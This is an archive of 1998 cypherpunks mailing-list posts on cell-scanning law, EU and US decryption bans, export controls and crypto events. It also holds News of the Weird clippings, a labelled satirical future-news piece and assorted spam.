> and programmable RF receivers.

The ECPA (Electronic Communications Privacy Act) banned cell phone
scanning, as of 1994 I believe. When Newt was monitored, that was
nothing really new.

Ch 83, (890-986?) is cell, however Federal law (Title 18, Chapter 119)
makes cell monitoring illegal only if it INTENTIONAL. And owning and
buying cell-phone capable devices is LEGAL. The only catch is who is
selling it, it is my understanding you can sell a cell scanner used
without a prob. I currently own a cell-capable scanner. 

~Jim
------------------------------------------
A great man named Ben Tersian once said
"Avoid the cliche 'Information must be free'"
"Find it learn it embrace it and set it free."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne CypherPunk <cap@knees.gun>
Date: Mon, 9 Mar 1998 16:52:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: I want 5-1/2 inches, and I want to bleed...
Message-ID: <35047E46.16EF@knees.gun>
MIME-Version: 1.0
Content-Type: text/plain


* Robert Kong, 13, was arrested and charged with manufacturing a
destructive device, namely a 5-1/2-inch pipe bomb that he had
made, gift-wrapped, and presented to a female classmate in
Corvallis, Ore., for her birthday.  He said he followed the
instructions he had seen on an Internet site.

~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wilhelm Geiger III <do@2me.dash>
Date: Mon, 9 Mar 1998 16:50:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Filth Dogman of the Surveillance Apocalypse
Message-ID: <35048609.5EB4@2me.dash>
MIME-Version: 1.0
Content-Type: text/plain


* In August, two cities debated plans to reduce the amount of dog
poop in municipal parks and on sidewalks.  The city of
Christchurch, New Zealand, was contemplating installing a series
of anonymous "poopcams" around town to catch dog owners who
neglect their scooping duty.  And Tel Aviv, Israel, announced that
squads of plainclothes police officers armed with cameras and
night-vision equipment were on duty around the clock
photographing violators of its ordinance.

~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: orowley@imaginemedia.com (Owen Rowley)
Date: Mon, 9 Mar 1998 16:55:40 -0800 (PST)
To: Dave Emery <die@die.com>
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v03102809b1265edd4202@[207.167.93.63]>
Message-ID: <35048F2F.CFCC496D@imaginemedia.com>
MIME-Version: 1.0
Content-Type: text/plain




Dave Emery wrote:

>         To amplify my point a bit, it is widely reported that Bill Gates
> (who is alleged to have started out in business by pirating and selling
> DEC software as a high school student) has a particularly keen desire to
> control the widespread piracy of MS products.  His aggressive pushes to
> assert his property rights are well known (and not atypical of reformed
> sinners if the probably apocryphal report is true).

some clues:

clue 1)
http://www.fourmilab.ch/autofile/www/section2_106_6.html#SECTION001066000000000000000

clue 2)
http://www.fourmilab.ch/autofile/www/section2_106_7.html

bonus mega clue)
http://www.fourmilab.ch/autofile/www/section2_106_1.html#SECTION001061000000000000000

HELL Check out  the whole Program.

http://www.fourmilab.ch/autofile/www/chapter2_106.html

LUX ./. owen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Rubin <rubin@research.att.com>
Date: Mon, 9 Mar 1998 13:59:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Updated list of crypto and security courses
Message-ID: <199803092156.QAA12426@mgoblue.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everyone for your great suggestions/additions/deletions.
I added, changed or deleted over 25 courses this time around. Now
back to my regularly scheduled life.

The updated course list can be found at:

   http://www.cs.nyu.edu/~rubin/courses.html

Avi


*********************************************************************
Aviel D. Rubin                                 rubin@research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Mon, 9 Mar 1998 14:04:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Crypto as contraband
In-Reply-To: <3.0.5.32.19980309094018.007be4f0@otc.net>
Message-ID: <Pine.GSO.3.93.980309162956.19564A-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The morons in congress responded to intercepts of cellphones.  Because
> Newt was scanned.  Response: outlaw *cellphones*... which are 
> themselves typically programmable as scanners of cell freqs.  And scanners
> and programmable RF receivers.

The ECPA (Electronic Communications Privacy Act) banned cell phone
scanning, as of 1994 I believe. When Newt was monitored, that was nothing
really new.

Ch 83, (890-986?) is cell, however Federal law (Title 18, Chapter 119)
makes cell monitoring illegal only if it INTENTIONAL. And owning and
buying cell-phone capable devices is LEGAL. The only catch is who is
selling it, it is my understanding you can sell a cell scanner used
without a prob. I currently own a cell-capable scanner.

~Jim
------------------------------------------
A great man named Ben Tersian once said
"Avoid the cliche 'Information must be free'"
"Find it learn it embrace it and set it free."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 10 Mar 1998 04:15:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: DCSB: Adam Shostack; No Silver Bullet -- Digital Commerce and Payment Security
Message-ID: <v04003a18b12a2597bcdc@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Mon, 9 Mar 1998 17:37:24 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Adam Shostack; No Silver Bullet -- Digital Commerce and
 Payment Security
Cc: Adam Shostack <adam@homeport.org>, Jeremey Barrett <jeremey@bluemoney.com>,
        "Michael S. Baum" <michael@verisign.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----

              The Digital Commerce Society of Boston

                            Presents

                        Adam Shostack
                         Netect, Inc.

                       "No Silver Bullet"
           Digital Commerce and Payment Security

                    Tuesday, April 7, 1997
                           12 - 2 PM
               The Downtown Harvard Club of Boston
                  One Federal Street, Boston, MA



The traditional threats that apply to digital commerce systems are the same
as the threats against all other commerce systems.  But the communications
networks that are available to the bad guys make possible and effective
attacks that could never work before.  Adam Shostack will examine some of
these new threats to electronic commerce, some of the potential solutions,
and share his vision of the future tools to protect commerce.

New attacks against commerce include the automation of knowledge.  The
pickpocket of old needed to practice for years to learn how to be
effective.  Today's 14 year olds can download a package with a win95
interface to exploit security holes.  The nature of the internet allows
them to engage in these attacks anonymously. The anonymous nature of the
net also means that people can engage in attacks that have a very small
payoff, or a small chance of a large payoff.  They also engage in attacks
for the thrill of it, costing companies trust and confidence, as well as
down time and its associated lost revenue.

New methods of dealing with the threats and problems posed by the
automation of new attacks will be required.  Where 'traditional' security
measures, such as firewalls, have failed to deal with the new attacks,
there is need to try new approaches. This talk will cover the new breeds of
attack, and the new methods of building secure foundations to help busy
companies cope.


Mr. Shostack is Director of Technology for Netect, Inc, a startup making
innovative applications to help cope with the new breed of security
problems.  He has extensive background in designing, implementing and
testing secure systems for clients in the medical, computer, and financial
industries. His recent public work includes 'Apparent Weaknesses in the
Security Dynamics Client Server Protocol,' 'Source Code Review Guidelines,'
and comparisons of freely available cryptographic libraries. Adam was also
one of the instructors, along with John Kelsey of Counterpane, and Gary
Howland of SecureAccounts, in Ian Goldberg's FC98 Financial Cryptography
Workshop, which was held in Anguilla in early March this year.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, April 7, 1997, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$32.50. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting for sale on CD/R, and to put it on
the web in RealAudio format, at some future date.


We need to receive a company check, or money order, (or, if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
April 4th, or you won't be on the list for lunch.  Checks payable to
anyone else but The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $32.50. Please include your e-mail
address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Upcoming speakers for DCSB are:

May       Jeremey Barrett     Digital Bearer Certificate Protocols
June      Michael Baum        PKI and the Commercial CA

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to <mailto: majordomo@ai.mit.edu> . If
you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to <mailto: majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQEVAwUBNQRurMUCGwxmWcHhAQFLyQf9H4KUArV/SocXwK6O5aW028g2NsFUp5qU
PfZfFn+3paQrsG+9dhKAsDb+GvMYgS4ZADV+s1yZTeQjHShHST4o5WiHqOtd9ALY
nWd3F9FDngiD8LuCXXoC4Q8vLEazsFSNSXJG9tCR+OkoJgLZFM3997AO4dNPLm59
u42EAzlt435AlFFvPRiVA3mvKf2eFDbdXMiE8x3vfZvoqSYl33EVH1j4PvUr3BU4
IP01x6Ap+Cs3SBoAFb27O57X7fX6MFascwn+h6Vv/gFxnpTwRXgUK+05Hzeh/ZUf
Qe+tKR1cz1GqP7g0H9CHFLxHce0CB6f8izYhTxj6tsD6jB33aUWOFg==
=Hdoe
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb-announce
Or, to subscribe,           write:  subscribe dcsb-announce
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Mon, 9 Mar 1998 18:12:26 -0800 (PST)
Subject: JT's Restarants - Excellent Undervauled Investment Opportunity
Message-ID: <199803100212.SAA08270@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list please reply to this message with 
"REMOVE" in the subject.

Recently we wrote you to tell about an excellent investment opportunity 
in JT's Restaurants (OTC BB: JTSR).  Since our last message was sent 
JTSR has risen in value over 40% (from Feb 17, 1998 to March 6, 1998).  
This is just the beginning.  This is still a ground floor opportunity.  
If you would like more information about this exciting investment 
opportunity please visit our web site at http://www.jtsr-stock.com or 
call 1-888-295-6365 for complete information.

The contents of this message have been provided for the review of 
potential investors only and does not constitute an offering of 
securities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 9 Mar 1998 18:04:25 -0800 (PST)
To: even@cs.technion.ac.il
Subject: Statsi, sayanim, spiking crypto
Message-ID: <35049DD9.52CA@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 3/9/98 6:17 PM

merata@pearl.sums.ac.ir
lawya@lucs-01.novell.leeds.ac.uk
sjmz@hplb.hpl.hp.com

Guys

I just read a printed copy I made of 

 Crypto AG: The NSA's Trojan Whore?

 http://caq.com/CAQ/caq63/caq63madsen.html

starting at http://www.aci.net/kalliste/

fairly carefully.

I seized upon Madsen's statements,

1 the random encryption key could be automatically and 
  clandestinely transmitted with the enciphered message.

2 they may also have been tipped off by Stasi files of the 
  ex-East German regime that found their way to Iran

Try MfS agents who went to work for Iran after the Cold War.

Then there was the postcard from Tel Aviv I received at 
Sandia labs which followed-up a yellow piece of paper sent
by snail mail asking numbered detailed question about work 
I was doing at Sandia.

I responded back to the postcard, by postcard of course, 

               "Know any sayanim?"

No response. 

It doesn't take at rocket scientist to figure that one out.

Let's all hope for settlement of this unfortunate matter so that
we can all move on to more constructive projects.

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 9 Mar 1998 18:48:36 -0800 (PST)
To: wpi@wpiran.org
Subject: REASONABLENESS
Message-ID: <3504A945.1286@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Guys

The great ANGLO ARMADA is sailing near Iran.

And the Armada needs to expend its 'intelligent' weapons
for business reasons.

Be on the BEST OF BEHAVIOR. 

best regards
bill


Monday 3/9/98 6:17 PM

merata@pearl.sums.ac.ir
lawya@lucs-01.novell.leeds.ac.uk
sjmz@hplb.hpl.hp.com

Guys

I just read a printed copy I made of 

 Crypto AG: The NSA's Trojan Whore?

 http://caq.com/CAQ/caq63/caq63madsen.html

starting at http://www.aci.net/kalliste/

fairly carefully.

I seized upon Madsen's statements,

1 the random encryption key could be automatically and 
  clandestinely transmitted with the enciphered message.

2 they may also have been tipped off by Stasi files of the 
  ex-East German regime that found their way to Iran

Try MfS agents who went to work for Iran after the Cold War.

Then there was the postcard from Tel Aviv I received at 
Sandia labs which followed-up a yellow piece of paper sent
by snail mail asking numbered detailed questions about work 
I was doing at Sandia.

I responded back to the postcard, by postcard of course, 

               "Know any sayanim?"

No response. 

It doesn't take at rocket scientist to figure that one out.

Let's all hope for settlement of this unfortunate matter so that
we can all move on to more constructive projects.

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 9 Mar 1998 17:39:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: U.S. NATIONAL INFORMATION EMERGENCY DECLARED (Future View) (fwd)
Message-ID: <Pine.SOL.3.96.980309203830.6573A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


____________________________________



U.S. NATIONAL INFORMATION EMERGENCY DECLARED (Future View)

Hamilton, Bermuda  -- Radio Free America at 2000 UTC -- (February 24,
1999)
-
FBI director Louis Freeh, Jr. today announced a nationwide crackdown on
Internet abusers as President Clinton invoked  new authorities granted
him under the Information Infrastructure Defense Act (IIDA) of 1998. White
House Press Secretary Monica Lewinsky said the President declared  a
national information emergency at 9:23 last night. The emergency
automatically lasts for 100 days. The President may then seek an extension
after consulting with three members of Congress. The FBI's Indication and
Warning Threat Center in Newington, Virginia first reported an 850 percent
increase in illegal Internet access attempts last Thursday, prompting Mr.
Freeh to ask for the presidential emergency declaration. 

Among the sites hacked were the White House's Automated Oval Office Visit
Scheduling System; the Democratic National Committee's Insta-Donation
System; the Bureau of Alcohol, Tobacco, and Firearms Tennessee
Summer Picnic Reservation System; the FBI's Hostage Rescue Team's
Seventh Day Adventist Watch Network (also known as "Deep Six the Sevens
Net"); the Electronic Pearl Harbor Visitors' Center;  the Arkansas
Attorney General's Cases-Disposed -Without-Further- Investigation System;
the Embassy of China's "Rent-a-Prez" system; and the Indonesian Embassy's
Rupiah-to-Dollar Laundromat Net.
       
The nationwide sting of Internet intruders began at noon yesterday
when the New York field office of the Secret Service arrested 25 members
of the Brooklyn Cyberspace Liberation Front at their regularly scheduled
Tuesday meeting at a Bayside Cyber Caf. Secret Service spokesman Biff
"Buck" Arew said, "it took us a while to figure out when they were going
to be in one spot, but after we employed our best investigative
techniques, we had them right where we wanted them. The arresting part was
easy." 

The Secret Service is a designated  information infrastructure law
enforcement agency under the 1998 legislation. It was joined by elements
of the FBI, the U.S. Marshals' Service, the Federal Emergency Management
Agency, the Postal Inspection Service, the Park Service, the Border
Patrol,  the Enforcement Division of the Federal Communications
Commission, as well as New York Mayor Rudy Giuliani, in the coast-to-coast
operation. Meanwhile, special FAA security officers on loan from Microsoft
were busy at the nation's airports searching the notebook and palmtop
computers of air travelers for illegal software programs.  At the
Pentagon, the Chairman of the Joint Chiefs of Staff said, "the military
now reserves the right to move forward on the information super highway."

He said he considers the Internet similar to the nation's interstate
highway system.  "When you have a bunch of stalled cars from a
high-altitude combination electromagnetic and gamma-ray burst littering
all the passing lanes and on- ramps, our armored vehicles just need to
push them aside and move on."

The general, who escaped a recent international war crimes indictment
resulting from his peacekeeping duties in Angola, did not elaborate on the
meaning of his comment.  Other mass arrests of hackers were made in
Chicago; New Orleans; Sunnyvale, California; Tampa; Atlanta, Washington,
D.C.; Los Angeles; and St. Louis.  Some of the arrested individuals are
noted opponents of the government's policies to control the flow of
information on the Internet.  Internet users report that some
controversial web sites are no longer accessible, although the FBI
refused to confirm whether their operators were among those arrested.

The inaccessible sites include those of the Libertarian Alliance, USA;
Cascadia Green Party; Outer Banks Secessionist Party; Ashcroft for
President 2000; Supreme Court, Free Crypto Home Page;  First Amendment
Enforcement Coalition; United We Stand (Marxist-Leninist); SPAM
Prohibition League;  Virtual Zapatista, and the Arizona Naturist Home
Page.

Federal officials stated that the number of arrests totaled more than
900. Critics of the government action claim the number is much higher. An
Amnesty International spokesperson in Teheran said she thinks the number
may be well over 15,000 but that it was "difficult to get news from
America under the present circumstances." The National Security Agency's
National Information Warfare Center in Fort Meade, Maryland, reported that
the identities of several overseas hackers had been passed to their
respective governments for possible prosecution under U.S. law under the
mutual law enforcement and extradition provisions of the IIDA. Scotland
Yard said it had arrested 17 intruders in the greater London area while
Europol was preparing to make several arrests in France, Italy, and
Austria.  At a press conference at the U.S. Embassy in London, Prime
Minister Tony Blair, upon leaving a cabinet meeting, said he was in close
communication with President Clinton during "this extraordinary emergency"
and that "he fully understood what the Americans were ordering him to do."

The government of Burma summarily executed 153 members of the Rangoon
Computer Club. In Ottawa, the RCMP said  the FBI's Canada Law Enforcement
Extension Task Force was investigating several groups in Montreal,
Halifax, and Vancouver and expected to make a large number of arrests
"soon." The RCMP official admitted that, "because we do not normally get
involved in FBI matters on Canadian soil, I cannot give you precise
details about the operation."
        

If convicted, the arrested hackers face a maximum penalty of 25
years in prison and/or a $200,000 fine. Freeh said that he anticipated
further arrests would be made as federal investigators sifted through more
communications records, America On Line profiles, and escrowed encryption
keys. The stored keys are used by federal agents to read scrambled e-mail
messages sent by hackers and the 12 independent special counsels
investigating the administration.
        
Vice President Gore issued a statement in which he said, "I praise
the valiant efforts of our federal investigators in isolating and
terminating the disruptive actions of individuals and groups who were bent
on interfering with our precious national information thoroughfares." Gore
said he hoped the government's action would "send a clear signal to others
who believe that such activities will go unpunished. The government has a
controlling legal authority to address these threats." Gore, an announced
candidate for president in 2000, said one of his first acts would be to
create a Secretary of Information cabinet post that would regulate the use
of electronic information throughout the country. "Just as we created a
Department of Defense in 1947 to confront the nuclear threat, we must have
a Department of Information in 2001 to face the millennial cyber threat,"
Gore declared.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Mon, 9 Mar 1998 18:29:04 -0800 (PST)
To: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: Re: EU plans decryption ban
In-Reply-To: <E0yCBw1-0004gz-00@heaton.cl.cam.ac.uk>
Message-ID: <19980309212946.23723@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Mar 09, 1998 at 11:26:15PM +0000, Markus Kuhn wrote:
> After government attempts to ban unrestricted encryption, we are
> now facing a decryption ban
> 
> Industry lobbyist groups have managed to persuade the European
> Commission to introduce rather radical new legislation for protecting
> pay-TV broadcasters against unauthorized reception by consumers. Not
> only the commercial advertising and sale of pirate devices is to be
> prohibited (this has already been the case in a number of member
> countries and is perfectly acceptable), but also the private possession or
> use of clone decoders as well as any private exchange of information about
> the security properties of pay-TV encryption systems will become illegal
> and punishable under the planned EU conditional access directive. 
> 
	In the US there is not yet a ban on exchange of information
because of the potential first amendment issues, but there are (and have
been since the late 1980s)  felony level bans with $500,000 fines for
each incident  on the manufacture, assembly, modification, import,
export, sale and distribution of any device or equipment primarily of
assistance in the unauthorized decryption of satellite cable programming
or direct to home satellite.

	And unauthorized interception of radio signals including satellite
video transmissions that are scrambled or encrypted can be prosecuted
under current law as a felony.



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Mon, 9 Mar 1998 18:48:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Wu-Tang Clan cypherpunk reference
Message-ID: <Pine.LNX.3.95.980309213743.17033A-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Watch for the wooden soldiers, C-cypher punks couldn't hold us"
	-- "Triumph," Wu-Tang Clan, -Wu-Tang Forever-

This is listed on the Wu-Tang Clan's home page (www.wu-tang.com), so
presumably the lyric is accurate.  Anyone know what the reference is?


-- 
 Andrew Fabbro   [afabbro@umich.edu]   [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/          313.647.2713 
 "We make money the old fashion way. We print it." - DigiCrime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: filaman@blrg.tds.net
Date: Tue, 10 Mar 1998 04:33:47 -0800 (PST)
To: <webmastr@ac.grin.edu>
Subject: Do you have a Bulk E Mail Program?
Message-ID: <199803101233.EAA12335@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Regarding Daily Ministry Messages

According to Research 50 percent of the U.S. population, or 135 
million people, will communicate by email by 2001 and 30 million 
use email now. 

You can fully test a Free working version of a fine established 
professional bulk e mail program that both sends and collects.  
You can market your product to millions without .32 cent postage 
stamps required. A million letters would cost you $320,000 just 
in stamps, plus the time to stuff and address.  
Bill Gates owner of Microsoft says their will only be two types 
of businesses by the year 2000. Those that use E Mail and those 
that went out of business. 
Give us a try, e mail is the coming thing and I believe you will 
be pleasently suprised. It's a great tool for daily ministry 
messages.  The product is also free for 10 days so you can 
download at this site and test it. 
Check out this website, just click on 

http://www.mymlm.com/aardvark/home.htm   

or type it in the heading of your Web Browser and touch enter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Mar 1998 04:20:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: BATFC -- Bureau of Alcohol, Tobacco, Firearms and Cryptography
Message-ID: <1.5.4.32.19980310122240.006c38bc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim's and Michael's exchanges (with others) are most welcome,
and constructively return us again to the most compelling aspect
of the encryption debate, the contest between law and technology,
one that has impact far beyond cryptography.

There are examples of the application of law to control of technology
in the President's most recent update of "The National Emergency 
Caused by the Lapse of the Export Administration Act of 1979":

   http://jya.com/hd105-191.htm

It recounts the activities of the Commerce Department -- mainly BXA --
for the latest 6-month reporting period, and lists as well the cases of 
penalties imposed for export violations. 

Some of these have been imposed for alleged violations over 6 years 
past. They exemplify what Tim and Michael are discussing of the 
various ways the regulations and laws are imposed according to 
policy shifts and wind direction of politicians. 

The report describes the beef up of BXA enforcement programs, 
and increasing coordination with and training of other countries for 
export enforcement.

All justified by a "national emergency" for which the underlying law
to control technology long ago lapsed. The lapse appears to be
a deliberate way to avoid having to define ahead of time what
technology is to be controlled in order that ad hoc policy and
regulations can be devised to fit, deal by deal.

This parallels the increase in indecipherable grand jury proceedings, 
plea bargainings and parole conditions, determined by protected
government employees. These, to be sure, appear to be close 
cousins of the bloated features of legacy technologies, civilian
and military.

It worth noting that Microsoft and the Justice Department are perfect 
twins of technology and law monopolies, using brute force and 
contracts to get their way, both clothed in self-righteousness and
both led by charming weirdos, both totally obsessed with each their 
own mad view of law and technology in the "public interest."

Still, there's some public benefit that these disputes are white collar
and not homicidal/suicidal battles of NBC warfare, at least not yet 
here at home.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Tue, 10 Mar 1998 07:30:26 -0800 (PST)
To: CYPHERPUNKS@TOAD.COM
Subject: Information From The Microsoft Personal Information Center
Message-ID: <0108d4829150a38UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: cypherpunks

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 10 Mar 1998 07:07:43 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: The Filth Dogman of the Surveillance Apocalypse
In-Reply-To: <Pine.BSF.3.91.980309062944.3862B-100000@mcfeely.bsfs.org>
Message-ID: <199803101507.KAA11013@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713781.multipart/signed"

--Boundary..3990.1071713781.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <Pine.BSF.3.91.980309062944.3862B-100000@mcfeely.bsfs.org>, on 03/09/98

   at 06:32 AM, Rabid Wombat <wombat@mcfeely.bsfs.org> said:



>Toto needs to study the bat book.

>On Mon, 9 Mar 1998, Wilhelm Geiger III wrote:

>> * In August, two cities debated plans to reduce the amount of dog
>> poop in municipal parks and on sidewalks.  The city of

Wow a TOTOgram with my name on it. Next thing you know I'll start getting
ascii art from Dimitri :)

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
 
Tag-O-Matic: Windows NT: From the makers of Windows 3.1!


--Boundary..3990.1071713781.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlFWSmxvOUNvMW4rYUxoaEFRRkk1QVArT0V6
SGtyeGJLWDNOMlltbDNreFZFT3c2M2tjRTVURHEKMFhaelN2R2NBL2hJaXky
MFZDbC9yOHczUEh5S3V3MStDRU9CS3BLUGRSS2JoQ21wZnFIZ3N1bm1QOEZD
L2dhawpvRFdzS0NyVzAxRlZyRXBLaTFRNjhyRkpQUGt2R2JlS1pQNXd6eWdE
MFYzeUlQVXBnd0RGSlhQZ2lwWWxyS3VJCjhLTGZMQmwwRHZrPQo9R2FYMQot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713781.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 10 Mar 1998 09:58:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sun vs. FUD: Elvis is waiting;   Sun puts high-strength encryption software aside
Message-ID: <3.0.5.32.19980310095810.007a0100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=n/reuters
/980310/wired/stories/sun_4.html



Tuesday March 10 9:58 AM EST 

  Sun puts high-strength encryption software aside

  SAN FRANCISCO (Wired) - Sun Microsystems, which had hoped to market
high-strength encryption software developed by a Russian firm, has put the
plans
  on hold due to ongoing scrutiny by the US Commerce Department, the Wall
Street Journal reported Monday. 

